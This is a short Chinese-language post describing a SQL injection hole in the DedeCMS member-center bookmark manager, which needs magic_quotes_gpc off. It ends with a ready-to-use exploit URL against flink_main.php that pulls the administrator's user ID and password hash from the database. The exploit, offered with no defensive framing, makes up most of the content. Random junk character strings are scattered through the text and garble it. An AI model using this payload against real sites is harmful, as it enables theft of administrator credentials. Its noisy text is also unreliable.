DedeCMS会员中心SQL注射漏洞
$ _' W# p. p2 L" G% t7 q需要magic_quotes_gpc = Off
9 U2 ^- B% S/ w3 m0 o会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
8 B$ G+ t, C, G T' n) O2 { 1 [/ W! Z' q2 {: w, o
DedeCMS会员中心书签管理SQL注射漏洞: R- _8 Y: B3 O: d
成功利用该漏洞可获得管理员密码: T; S) B* [* Y! {# ]
, b, f; j# {# o4 T% _3 E
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码. ]4 K. C2 z2 V$ E3 i: f
- n! `, c- j. P5 A N
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
9 _& n, }4 d/ w# J$ l |